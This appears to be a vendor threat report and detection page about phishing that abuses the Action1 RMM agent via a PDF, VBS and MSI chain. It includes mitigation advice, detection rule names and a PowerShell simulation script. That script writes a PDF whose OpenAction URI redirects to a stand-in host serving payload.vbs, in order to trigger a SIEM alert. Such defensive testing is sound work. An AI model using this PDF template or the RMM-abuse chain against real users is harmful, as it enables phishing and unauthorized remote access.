RMM Tool Abuse Continues to Grow Across Active Threat Campaigns
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Threat actors are abusing Remote Management and Monitoring (RMM) tools, particularly Action1, to establish persistent access within compromised environments. The attack starts with a phishing email carrying a malicious PDF that redirects victims to a VBS file. The script then downloads and installs an MSI package containing the legitimate Action1 agent, enabling unauthorized remote access.
Investigation
The investigation uncovered a malicious PDF that leverages OpenAction and URI keywords to initiate a download from a Vercel-hosted URL. Analysis of the retrieved MSI package revealed legitimate Action1 Corporation files being misused through the vendor’s own cloud infrastructure. The installed agent contains a specific CustomerID and communicates with a legitimate Action1 domain.
Mitigation
Organizations should configure email filtering to identify suspicious PDF structures containing OpenAction or URI keywords. Security teams should monitor for unauthorized RMM tool installations and creation of the A1Agent service. Blocking connections to unexpected RMM cloud infrastructure and identifying unusual or unauthorized CustomerIDs can further reduce the risk of remote access abuse.
Response
When malicious RMM activity is detected, isolate the affected host to prevent additional remote command execution. Investigate the originating phishing email and conduct forensic analysis of the associated VBS and MSI files. Revoke potentially compromised credentials and review Action1 agent configurations for indicators of unauthorized remote access or persistence.
Attack Flow
We are still updating this part.
Detections
LOLBAS WScript / CScript (via process_creation)
Alternative Remote Access / Management Software (via process_creation)
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
Possible Command and Control Activity by Remote Access Software Domain Communication Attempt (via dns)
IOCs (HashSha256) to detect: More RMM Tools In the Wild
Remote Connection to Action1 Corporate Servers [Windows Network Connection]
PDF OpenAction and URI Redirection to Malicious VBS [Windows File Event]
Simulation Execution
-
Attack Narrative & Commands: The adversary is simulating a phishing campaign. The goal is to deliver a file named
Transaction Receipt .pdfto a victim. The PDF is specially crafted so that as soon as the user opens it, the/OpenActioncommand triggers a/URIredirect. This redirect is designed to lead the user to a site that serves a malicious VBScript. To trigger the specific detection rule provided, we will create a file with the exact name and internal strings required. -
Regression Test Script:
# Simulation Script: Triggering the PDF OpenAction Detection $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf" # Crafting the "malicious" PDF content to match the detection keywords $pdfContent = @" %PDF-1.1 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >> endobj 2 0 obj << /Type /Pages /Parent 1 0 R /Count 1 >> endobj trailer << /Root 1 0 R >> %%EOF "@ # Writing the file to disk to trigger the 'file_event' detection $pdfContent | Out-File -FilePath $targetFile -Encoding ascii Write-Host "Simulation file created at: $targetFile" Write-Host "Check your SIEM for the detection alert." -
Cleanup Commands:
# Cleanup: Remove the simulated malicious file $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf" if (Test-Path $targetFile) { Remove-Item -Path $targetFile -Force Write-Host "Cleanup complete: $targetFile removed." } else { Write-Host "Cleanup: File not found." }